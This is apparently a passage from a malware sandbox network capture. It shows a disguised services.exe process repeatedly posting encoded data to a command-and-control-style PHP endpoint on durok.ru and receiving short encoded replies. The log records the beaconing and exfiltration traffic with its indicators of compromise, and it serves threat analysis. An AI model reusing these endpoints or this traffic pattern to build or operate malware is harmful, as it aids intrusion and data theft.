                                                                                                                              Dec 26, 2024 17:18:31.205693960 CET801INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:31 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OCgUxxMNPYcldwcUe2lq%2FxzTCVVmYUhn1gRkE8frQLrqc1kI8cobbfNlC%2B9mpND4jD%2BE%2Bb0sLu1AZ8PjkMuOjR%2FA75TeJcDVgpvk1N07t4kT4qbhZoYPe2vQlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82631e5f3cefa1-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8358&min_rtt=1784&rtt_var=13818&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=26847&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              77192.168.2.449885104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:30.533382893 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:30.880510092 CET2128OUTData Raw: 5c 5b 5e 5e 54 5c 5c 52 5e 58 52 54 56 58 58 55 54 57 5b 54 56 5f 53 58 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \[^^T\\R^XRTVXXUTW[TV_SXPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'<"0_+:!5T#..6>&Y' 7/ ,[.\ ?0*%"Z.#Z*"
                                                                                                                              Dec 26, 2024 17:18:31.710469961 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:31.961982012 CET946INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:31 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JAOSxu4E3Uf%2FwI1O4kOuULm1TA0NftezZecrpZylHBeAwupW5qeV%2FqGLd8vD9fCY9pHUDHwQnOsyzrb0PhLywFmZkNzvdxsbctOtlILIINr%2FDjmOrmcfu3TT1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263232c0ac407-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8202&min_rtt=1709&rtt_var=13628&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=27208&cwnd=196&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 1e 29 2a 3c 0e 20 5a 30 56 28 2d 21 0f 29 08 22 04 2a 22 2d 17 28 3f 22 52 2b 3b 37 1a 20 5c 2d 02 28 3a 3b 01 31 18 25 03 25 21 2e 5c 05 1d 24 05 3e 38 23 07 33 31 2a 00 2b 3e 31 18 28 2d 22 03 27 59 3c 05 37 5d 36 5c 22 31 34 5d 3b 2c 3f 06 3a 02 2f 00 2a 20 07 04 35 3d 21 51 0c 1f 38 1c 35 3a 20 00 31 3e 2a 0b 22 30 28 09 25 28 22 56 21 2b 3f 1d 30 14 3b 58 32 0d 23 1e 22 3e 27 55 3c 3e 32 5b 31 3f 35 5a 3d 39 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$)*< Z0V(-!)"*"-(?"R+;7 \-(:;1%%!.\$>8#31*+>1(-"'Y<7]6\"14];,?:/* 5=!Q85: 1>*"0(%("V!+?0;X2#">'U<>2[1?5Z=9%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              78192.168.2.449889104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:31.452398062 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:31.803553104 CET2548OUTData Raw: 59 50 5e 51 51 5b 5c 57 5e 58 52 54 56 5d 58 50 54 54 5b 54 56 55 53 5e 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YP^QQ[\W^XRTV]XPTT[TVUS^PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$<2<Z+*!T!1(..>4&Y$'87<(W",2-9(<<\="Z.#Z*6
                                                                                                                              Dec 26, 2024 17:18:32.628463030 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:32.881541014 CET797INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:32 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rIub%2BOAh01qx%2BFcMNrpmWznnI0n6lCOPPpDYsPJY9CjSkQLGKcXfbqcRmE2QBwIS4B277O7yWJJ7flEYfHGkxUUb4XZ3LXhniPRQ03Xe3%2BNbydQHTudWHVCg1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826328ed327290-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3066&min_rtt=1843&rtt_var=3138&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=125515&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0
                                                                                                                              Dec 26, 2024 17:18:33.131807089 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              79192.168.2.449892104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:33.445492983 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:33.802706003 CET2548OUTData Raw: 59 5e 5e 5d 54 58 5c 56 5e 58 52 54 56 5c 58 50 54 57 5b 5d 56 53 53 5b 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y^^]TX\V^XRTV\XPTW[]VSS[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$<2 _<)W!"(Z,W=._$'\ <'#9::;?<]+5"Z.#Z*2
                                                                                                                              Dec 26, 2024 17:18:34.624866009 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:34.870090008 CET807INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:34 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7tbA7S%2B7Ox4jkhQvwm2XG3tVgoIVHJUuUqU%2FG%2BEaRg%2FjLt%2FblRh%2BD7JnREpscS0GkdCYCp%2BKwbER5Ng2CJL0VqQcwSfpTf5eSWiNUGhP97yquOh4D5XoJwY%2FFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263355e474309-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8145&min_rtt=1709&rtt_var=13514&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=27441&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              80192.168.2.449898104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:34.442589045 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:34.786797047 CET2128OUTData Raw: 59 5a 5b 5d 54 5c 59 54 5e 58 52 54 56 5e 58 56 54 50 5b 59 56 5f 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YZ[]T\YT^XRTV^XVTP[YV_SYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$<"4]>9%W!+.-&=$&X04#"?3"?1::'>3#*"Z.#Z*
                                                                                                                              Dec 26, 2024 17:18:35.623749971 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:35.869573116 CET946INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:35 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7HuBMvrT%2BCNAo8ByAmYQbjk1WG9K%2FO9c76LBudZrXqBpZZOMv36N7sDg1B%2FEvaEVgCW3U1TxpIE2qqZ4W8QR6euQKGplrfa9pM5ZqTI1sxMKbUUy1RbJ0hum6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82633b9fd7de9a-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8174&min_rtt=1695&rtt_var=13593&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=27275&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 59 3e 00 23 19 37 3f 24 56 28 2d 22 14 2a 21 0b 17 3c 32 22 01 29 2f 00 53 3f 06 30 08 37 3a 07 00 2a 2a 02 58 26 18 07 03 24 21 2e 5c 05 1d 27 19 28 05 3b 00 30 54 21 5f 2b 2d 25 18 29 2e 3d 5d 25 3c 23 58 20 02 3a 5e 37 32 3f 01 2c 3f 28 59 39 02 09 06 28 1e 39 04 21 2d 21 51 0c 1f 3b 0c 21 07 3b 1c 25 3e 00 0d 21 56 38 08 27 3b 2d 0a 36 2b 06 08 33 29 3f 58 31 0a 34 0f 22 2e 3c 0d 3c 13 3e 5b 32 3f 22 02 2b 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$Y>#7?$V(-"*!<2")/S?07:**X&$!.\'(;0T!_+-%).=]%<#X :^72?,?(Y9(9!-!Q;!;%>!V8';-6+3)?X14".<<>[2?"+)%^-#T>TV0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              81192.168.2.449899104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:35.144561052 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:35.489938974 CET2548OUTData Raw: 59 51 5e 51 51 5f 5c 52 5e 58 52 54 56 51 58 56 54 5c 5b 5f 56 56 53 54 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YQ^QQ_\R^XRTVQXVT\[_VVSTPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'("4(9"6',&=7>Y0'#4?/",--B?;>"Z.#Z*
                                                                                                                              Dec 26, 2024 17:18:36.322590113 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:36.573695898 CET801INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:36 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zS%2B95oQNpJ2n4fJRm8qXp6oK0DrW0%2Bx132RQ47GQcDH3u7K2c8opVwR9y8Djj2WtqEjDMVFDKuEvZrW05vf9Fj3VLOA5%2BnGZZv%2BRTs%2B%2Bq0kBUuSf2ueAiTXt9g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82633ffeae428f-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3861&min_rtt=1579&rtt_var=5157&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=73585&cwnd=99&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              82192.168.2.449905104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:36.830749035 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:37.177422047 CET2548OUTData Raw: 5c 5d 5e 5e 51 5c 59 57 5e 58 52 54 56 5d 58 52 54 52 5b 5e 56 53 53 5e 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \]^^Q\YW^XRTV]XRTR[^VSS^PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'+14[<*5,>"*!'B#["?3#<. B?#,Y*%"Z.#Z*6
                                                                                                                              Dec 26, 2024 17:18:38.008965969 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:38.262115955 CET794INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:38 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eEFScEqxFM2HYi8rj7I5SvlNW2vqUFWj%2BAQ5961dCWZVsA1B23TMwr15GaOKM3%2BslR7SA3euOKFSSPP9fE2BqwPtAkDVWTO5YnIokWlAJFx6CFff0gxCpNsXDw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82634a8c0f7cea-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4220&min_rtt=1772&rtt_var=5560&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=68364&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              83192.168.2.449906104.21.93.162802308C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 26, 2024 17:18:36.970320940 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:37.318070889 CET2128OUTData Raw: 59 51 5e 5d 51 5f 59 5b 5e 58 52 54 56 5f 58 55 54 51 5b 5d 56 55 53 5f 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YQ^]Q_Y[^XRTV_XUTQ[]VUS_PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$( Z<9%P#!(^..*?4)3$"<Q#<-.\8+#,_)"Z.#Z*>
                                                                                                                              Dec 26, 2024 17:18:38.149158955 CET25INHTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:38.579509974 CET953INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:38 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bo7HqQ00yqsf4pG3%2Bw3IuAFqJL4EUkfzeRo9RE%2B%2BFlf3CSZa078CfAbAb9asSOHvNsGl6P%2FdoD%2B69yLClsuqV1LtAS6nc6LNzl1U%2BaYKgWXjO4ede8zCy7t%2Fag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82634b6d21f795-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4143&min_rtt=1666&rtt_var=5580&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=67948&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 10 3d 07 09 1b 37 02 20 51 28 3d 22 1b 3d 32 39 1a 2b 31 2d 15 29 3c 3a 1e 2b 3b 3f 56 37 39 2a 5a 2a 04 2c 11 32 08 25 00 32 0b 2e 5c 05 1d 24 02 28 3b 24 1d 33 0c 35 58 29 3e 08 41 28 3e 21 5d 27 59 23 58 37 3b 3a 15 34 0f 23 00 3b 3f 34 1d 2d 12 0e 5e 2b 33 22 10 23 3d 21 51 0c 1f 38 54 22 3a 3c 03 26 3d 3d 57 36 0e 3b 1f 25 16 0b 0a 23 2b 37 51 27 5c 33 59 31 1d 2b 54 34 04 3b 55 3c 03 3d 07 32 3c 25 5a 2a 13 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$=7 Q(="=29+1-)<:+;?V79*Z*,2%2.\$(;$35X)>A(>!]'Y#X7;:4#;?4-^+3"#=!Q8T":<&==W6;%#+7Q'\3Y1+T4;U<=2<%Z*%^-#T>TV0
                                                                                                                              Dec 26, 2024 17:18:38.579664946 CET953INHTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:38 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bo7HqQ00yqsf4pG3%2Bw3IuAFqJL4EUkfzeRo9RE%2B%2BFlf3CSZa078CfAbAb9asSOHvNsGl6P%2FdoD%2B69yLClsuqV1LtAS6nc6LNzl1U%2BaYKgWXjO4ede8zCy7t%2Fag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82634b6d21f795-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4143&min_rtt=1666&rtt_var=5580&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=67948&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 10 3d 07 09 1b 37 02 20 51 28 3d 22 1b 3d 32 39 1a 2b 31 2d 15 29 3c 3a 1e 2b 3b 3f 56 37 39 2a 5a 2a 04 2c 11 32 08 25 00 32 0b 2e 5c 05 1d 24 02 28 3b 24 1d 33 0c 35 58 29 3e 08 41 28 3e 21 5d 27 59 23 58 37 3b 3a 15 34 0f 23 00 3b 3f 34 1d 2d 12 0e 5e 2b 33 22 10 23 3d 21 51 0c 1f 38 54 22 3a 3c 03 26 3d 3d 57 36 0e 3b 1f 25 16 0b 0a 23 2b 37 51 27 5c 33 59 31 1d 2b 54 34 04 3b 55 3c 03 3d 07 32 3c 25 5a 2a 13 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$=7 Q(="=29+1-)<:+;?V79*Z*,2%2.\$(;$35X)>A(>!]'Y#X7;:4#;?4-^+3"#=!Q8T":<&==W6;%#+7Q'\3Y1+T4;U<=2<%Z*%^-#T>TV0
                                                                                                                              Dec 26, 2024 17:18:38.728271961 CET307OUTPOST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
